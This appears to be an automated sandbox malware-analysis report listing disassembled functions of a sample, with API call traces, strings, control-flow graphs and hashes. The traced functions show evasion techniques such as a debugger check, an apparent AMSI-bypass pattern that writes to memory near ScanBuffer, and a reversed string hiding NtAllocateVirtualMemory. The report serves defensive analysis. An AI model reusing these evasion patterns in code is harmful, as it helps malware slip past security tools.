                                                                                                                                      • Opcode ID: d400ca5288ecda265db4266ce13eee2214072b0e61758449569dcaa4c51f010b
                                                                                                                                      • Instruction ID: 3e3d828b954d49e682ec22f393d6bc6c06179c123929b586c54ca415ba11816e
                                                                                                                                      • Opcode Fuzzy Hash: d400ca5288ecda265db4266ce13eee2214072b0e61758449569dcaa4c51f010b
                                                                                                                                      • Instruction Fuzzy Hash: 11E20B75A901189FDB26EB64CCA0FDF77BAAF89310F1049A1E009AB314DE30AE45DF51
                                                                                                                                      Function 02C35A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8510 2c35a78-2c35ab9 GetModuleFileNameA RegOpenKeyExA 8511 2c35afb-2c35b3e call 2c358b4 RegQueryValueExA 8510->8511 8512 2c35abb-2c35ad7 RegOpenKeyExA 8510->8512 8517 2c35b62-2c35b7c RegCloseKey 8511->8517 8518 2c35b40-2c35b5c RegQueryValueExA 8511->8518 8512->8511 8514 2c35ad9-2c35af5 RegOpenKeyExA 8512->8514 8514->8511 8516 2c35b84-2c35bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8514->8516 8519 2c35bbb-2c35bbf 8516->8519 8520 2c35c9e-2c35ca5 8516->8520 8518->8517 8521 2c35b5e 8518->8521 8523 2c35bc1-2c35bc5 8519->8523 8524 2c35bcb-2c35be1 lstrlenA 8519->8524 8521->8517 8523->8520 8523->8524 8525 2c35be4-2c35be7 8524->8525 8526 2c35bf3-2c35bfb 8525->8526 8527 2c35be9-2c35bf1 8525->8527 8526->8520 8529 2c35c01-2c35c06 8526->8529 8527->8526 8528 2c35be3 8527->8528 8528->8525 8530 2c35c30-2c35c32 8529->8530 8531 2c35c08-2c35c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8520 8532 2c35c34-2c35c38 8530->8532 8531->8530 8532->8520 8533 2c35c3a-2c35c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8520 8534 2c35c6c-2c35c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8520
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C30000,02C5D790), ref: 02C35A94
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AB2
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AD0
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C35AEE
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C35B37
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,02C35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001), ref: 02C35B55
                                                                                                                                      • RegCloseKey.ADVAPI32(?,02C35B84,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C35B77
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C35B94
                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C35BA1
                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C35BA7
                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C35BD2
                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C19
                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C29
                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C51
                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C61
                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C35C87
                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C35C97
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                      • API String ID: 1759228003-2375825460
                                                                                                                                      • Opcode ID: 4eb4c7cb8503daae725996ffc278b6f5417df8013845581444f64269e4e34608
                                                                                                                                      • Instruction ID: f789ba5b90fe4a819989a88f134f18ee0187c592ad0e22b95f64ab39c135eacf
                                                                                                                                      • Opcode Fuzzy Hash: 4eb4c7cb8503daae725996ffc278b6f5417df8013845581444f64269e4e34608
                                                                                                                                      • Instruction Fuzzy Hash: 9A51A971A4024C7EFB26D6A4DC46FEF77BD9B0C784F8409A1AA04E6181D7B49B449FA0
                                                                                                                                      Function 02C487A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 10523 2c487a0-2c487c5 LoadLibraryW 10524 2c487c7-2c487df GetProcAddress 10523->10524 10525 2c4880f-2c48815 10523->10525 10526 2c48804-2c4880a FreeLibrary 10524->10526 10527 2c487e1-2c48800 call 2c47d00 10524->10527 10526->10525 10527->10526 10530 2c48802 10527->10530 10530->10526
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
                                                                                                                                        • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                      • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                      • API String ID: 1002360270-4067648912
                                                                                                                                      • Opcode ID: 9d03acdc166dafd9c1cb6b09cc831b57708f4c184c008b667eda2d96857cd389
                                                                                                                                      • Instruction ID: 09c783728bac928814d8288a3b47583138a5d450b95877df9cea1602d352a6e4
                                                                                                                                      • Opcode Fuzzy Hash: 9d03acdc166dafd9c1cb6b09cc831b57708f4c184c008b667eda2d96857cd389
                                                                                                                                      • Instruction Fuzzy Hash: C3F04F71A81215FEEB119A68AC4EB7773BCB785359F180B79B10C87540CBF058508B50
                                                                                                                                      Function 02C4EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 10540 2c4ebf0-2c4ec0a GetModuleHandleW 10541 2c4ec36-2c4ec3e 10540->10541 10542 2c4ec0c-2c4ec1e GetProcAddress 10540->10542 10542->10541 10543 2c4ec20-2c4ec30 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 2c4ec32 10543->10544 10544->10541
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 02C4EC00
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C4EC12
                                                                                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C4EC29
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                      • API String ID: 35162468-539270669
                                                                                                                                      • Opcode ID: fed6c59af2203d7c7cebfe5504eac97ab999663298c920ffe396af766c6c1c0a
                                                                                                                                      • Instruction ID: e5084263d86b7fc952452a445e5dc286576a1f41ca92d157193c9bd63852c04a
                                                                                                                                      • Opcode Fuzzy Hash: fed6c59af2203d7c7cebfe5504eac97ab999663298c920ffe396af766c6c1c0a
                                                                                                                                      • Instruction Fuzzy Hash: 65F0A07090465CBAEB22A7A888897DEFBBD7B05328F640BA4E424621D1EB750784C655
                                                                                                                                      Function 02C4DBB0 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C34EDA
                                                                                                                                      • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DBEB
                                                                                                                                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DC1B
                                                                                                                                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C4DC30
                                                                                                                                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C4DC5C
                                                                                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C4DC65
                                                                                                                                        • Part of subcall function 02C34C0C: SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2659941336-0
                                                                                                                                      • Opcode ID: ef91da38ce04291ea29f9f5432b3716266ad94f47ce864d23bcebf20e95a1b55
                                                                                                                                      • Instruction ID: 4c6d5d8a59f33941f64bfde14799a72790af43f64f775e65b73d9151d8e5d955
                                                                                                                                      • Opcode Fuzzy Hash: ef91da38ce04291ea29f9f5432b3716266ad94f47ce864d23bcebf20e95a1b55
                                                                                                                                      • Instruction Fuzzy Hash: DE21D071A50708BAEB15EAE4CC46FDFB7BDAF48B00F500561B601F71C0DAB4AA449BA5
                                                                                                                                      Function 02C4E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C4E436
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckConnectionInternet
                                                                                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                      • API String ID: 3847983778-3852638603
                                                                                                                                      • Opcode ID: 147b82e340d28890f673bda6acb6aa115fe649be682b09c9d7aef8deb58de219
                                                                                                                                      • Instruction ID: 8529cd31d9ac9feb95403e219b2fb9f3dde7fb8b6b2278dbeb52e97f6fa6da1d
                                                                                                                                      • Opcode Fuzzy Hash: 147b82e340d28890f673bda6acb6aa115fe649be682b09c9d7aef8deb58de219
                                                                                                                                      • Instruction Fuzzy Hash: AD41ED75A502089BEB26EBE4DC41ADEB3FAFF8C720F614835E441A7250DA74AD059F60
                                                                                                                                      Function 02C4DACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C34EDA
                                                                                                                                      • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DB9E), ref: 02C4DB0B
                                                                                                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C4DB45
                                                                                                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C4DB72
                                                                                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C4DB7B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$AllocCloseCreateStringWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3308905243-0
                                                                                                                                      • Opcode ID: eedaff43223b06e837f8b72dc20890a9e686efe28aa4670b0190fec40f76fe18
                                                                                                                                      • Instruction ID: 4ca3a90be2e67ffe609b6a823fec9372ad4f621d51a9607d51e263b76968e256
                                                                                                                                      • Opcode Fuzzy Hash: eedaff43223b06e837f8b72dc20890a9e686efe28aa4670b0190fec40f76fe18
                                                                                                                                      • Instruction Fuzzy Hash: 9221ED71A40308BAEB25EAE4CC46F9EB7BDAB04B14F504561B601F71C0DBB0AE049A65
                                                                                                                                      Function 02C485DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C48668
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                      • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                      • API String ID: 3130163322-2353454454
                                                                                                                                      • Opcode ID: 316376d45e902c080af4b5029e22c8f530245e149aa2b35dd7fcab68ad1df924
                                                                                                                                      • Instruction ID: eb62d5d81219c18ab8eae80b9bbf703efa223282ba46a9dcfdb93b9fa2063f03
                                                                                                                                      • Opcode Fuzzy Hash: 316376d45e902c080af4b5029e22c8f530245e149aa2b35dd7fcab68ad1df924
                                                                                                                                      • Instruction Fuzzy Hash: C411D3B6600208AFEB91EEA8DD41FDF37EDEB0C710F554620BA08D7640CA74E9109B64
                                                                                                                                      Function 02C479B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 4072585319-445027087
                                                                                                                                      • Opcode ID: ae35c55d7c659ddd8094db45f0db5db96092bb79666b9856093587f4a8aba7f7
                                                                                                                                      • Instruction ID: 051cf75b71c1c10f34944b81dff5d831ecf324caf4adab2fb0e9ed19d5a12327
                                                                                                                                      • Opcode Fuzzy Hash: ae35c55d7c659ddd8094db45f0db5db96092bb79666b9856093587f4a8aba7f7
                                                                                                                                      • Instruction Fuzzy Hash: 00115775640208AFEB15EFA4DC42FAFB7ADEB48710F418861B908D7640DA70AA149B60
                                                                                                                                      Function 02C479B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 4072585319-445027087
                                                                                                                                      • Opcode ID: e5564f7677e7f2b9eceea7002fccd1256339dce290e404dc8ea6cbbec97d27de
                                                                                                                                      • Instruction ID: 8a7e3501d507530ca41b5bc3210e44cf1c66fff67f7d9fe97f722eb5c64616ca
                                                                                                                                      • Opcode Fuzzy Hash: e5564f7677e7f2b9eceea7002fccd1256339dce290e404dc8ea6cbbec97d27de
                                                                                                                                      • Instruction Fuzzy Hash: 40116975640208AFEB15EFA4DC42F9FB7BDEB4C710F418861B908D7640DB70AA14DB60
